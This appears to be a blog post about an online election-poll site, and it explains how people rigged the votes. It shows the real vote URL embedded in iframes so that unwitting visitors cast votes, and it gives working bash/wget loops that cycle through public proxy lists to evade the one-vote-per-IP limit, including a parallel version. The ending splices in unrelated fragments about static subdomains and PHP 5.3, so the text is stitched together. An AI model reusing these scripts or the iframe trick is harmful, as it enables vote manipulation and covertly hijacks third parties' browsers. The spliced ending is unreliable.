Few days ago some people called himself web-programmers, created a web-site where it was online voting for the parliament in my country. It was a simple system you select your region, select the candidate and vote for him. The purpose of this system was to know approximate results of the election…
One of the sites used requests by GET method. The only limit was about IP address. So, from one IP address you vote once. Many people took the URL with the request and put it to their web sites as a iframe, img, or something else. For example:
http://namized.com/index.php?menyu=sesver&daireid=55&namizedid=74&buttson=S%C6%8FS+VER
You put this on the iframe in your page
<iframe src="http://namized.com/index.php?menyu=sesver&daireid=55&namizedid=74&buttson=S%C6%8FS+VER"></iframe>and when your page is visited automatically it’s voted for “your” candidate.
GNU has a good tool called wget for downloading files from internet(or any other network). wget has a lot of options for performing different operations while you download the files. Most important options for “voting” purposes are –proxy, this little bash script will do your job:
while read line do export http_proxy=$line wget --proxy=on "http://namized.com/index.php?menyu=sesver&daireid=55&namizedid=74&buttson=S%C6%8FS+VER" done <proxy.list
Googling for proxy server list and copy/pasting them to proxy.list file on the current directory and then executing the script will vote for your candidate from different proxies. So, recorded IP address will be proxy IP address not yours.
Additionally if you want speed up the process by reducing your RAM and network resources you can change the script as follow:
while read line do export http_proxy=$line wget --tries=1 --timeout=10 --proxy=on "http://namized.com/index.php?menyu=sesver&daireid=55&namizedid=74&buttson=S%C6%8FS+VER" & done <proxy.list
Another web site used POST requests. wget has an option –post-data for solving this problem
Hmmm. Using a captcha could solve the problem…

I think you have seen such urls like static.blablabla.com on your favorite web sites. What is it?
I am happy to announce about PHP 5.3 release. Some of PHP 5.3 advantages are the followings: